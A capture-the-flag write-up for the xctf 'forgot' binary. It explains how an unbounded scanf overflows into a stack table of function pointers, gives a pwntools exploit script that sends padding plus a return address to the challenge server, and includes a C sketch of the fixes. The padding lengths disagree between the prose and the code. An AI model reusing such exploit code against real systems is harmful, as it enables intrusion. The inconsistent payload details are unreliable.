xctf - forgot

Run checksec first: NX is enabled.

Loading the binary in IDA, we find that __isoc99_scanf reads the input with no length limit.

In the loop, up to 32 characters of the string read by scanf are examined one by one, and at the end a function is called from a table according to the result. That table lives on the stack, just below the overflowed variable.

The call uses v3 + --v14 directly as the stack address of the function pointer, so when v14 is 1 the address used is v3 itself. Building a payload of 63 bytes of padding followed by the destination address therefore gets the flag.
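As an added illustration (not code from the challenge binary or the write-up), the two defects described above, an unbounded scanf("%s") into a buffer that sits directly above a stack-resident function-pointer table and an unchecked table index, beside their fixes: a bounded read that truncates instead of spilling into the table, and a range check on the index before it is dereferenced. The frame layout, NAME_LEN, NFUNCS and the handler functions are constructed assumptions, not the binary's own.

```c
#include <stdio.h>
#include <string.h>

#define NAME_LEN 32
#define NFUNCS   10

/* Constructed stand-in handlers; the real binary's handlers are not on the page. */
static int handler_default(void) { return 0; }
static int handler_other(void)   { return 1; }

/* Frame shape as the write-up describes it: the name buffer sits directly above
   a table of function pointers, so an unbounded scanf("%s") into name would run
   straight into table[]. The layout is an illustration, not the binary's own. */
struct frame {
    char name[NAME_LEN];
    int (*table[NFUNCS])(void);
};

/* Hardened replacement for scanf("%s", name): keeps at most out_len-1 bytes of
   one line and always NUL-terminates, so no input length can reach table[]. */
static size_t read_name_bounded(const char *line, char *out, size_t out_len) {
    size_t n = strcspn(line, "\n");
    if (n > out_len - 1) n = out_len - 1;   /* truncate instead of overflowing */
    memcpy(out, line, n);
    out[n] = '\0';
    return n;
}

/* Hardened dispatch: the table index (the write-up's v14) is range-checked
   before use, instead of dereferencing table[--v14] blindly. */
static int dispatch(const struct frame *f, int v14) {
    if (v14 < 1 || v14 > NFUNCS) return -1;  /* out of range: refuse to call */
    return f->table[v14 - 1]();
}

/* Runs the hardened path on one input line; returns the handler's result,
   -1 for a rejected index, -2 if table[] was clobbered (never expected). */
int run_hardened(const char *input, int v14, size_t *name_len_out) {
    struct frame f;
    for (int i = 0; i < NFUNCS; i++) f.table[i] = handler_default;
    f.table[1] = handler_other;
    *name_len_out = read_name_bounded(input, f.name, sizeof f.name);
    for (int i = 0; i < NFUNCS; i++)
        if (f.table[i] != handler_default && f.table[i] != handler_other)
            return -2;
    return dispatch(&f, v14);
}
```

Feeding run_hardened a 63-byte name keeps only 31 bytes and leaves every table entry intact, and an index of 0 or NFUNCS+1 is rejected before any call.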

exp:

from pwn import *

context.log_level = 'debug'

p = remote('111.198.29.45', 31543)
#p = process('./forgot')
'''
payload="A"*63+"\xcc\x86\x04\x08"
p.recvuntil("What is your name?")
p.sendline(payload)
p.interactive()
'''
# 0x24 bytes of padding, then the destination address (little-endian)
payload = b'A'*0x24 + p32(0x080486CC)
#payload = "A"*32+"\xcc\x86\x04\x08"
p.recvuntil(b"> ")
p.sendline(b'a')        # first prompt: the name
p.recvuntil(b"> ")
p.sendline(payload)     # second prompt: the overflowing input

p.interactive()

PS: For now I don't know why payload = "A"*32+"\xcc\x86\x04\x08" gets the flag but payload = "a"*32+"\xcc\x86\x04\x08" does not.

Origin www.cnblogs.com/yidianhan/p/12026062.html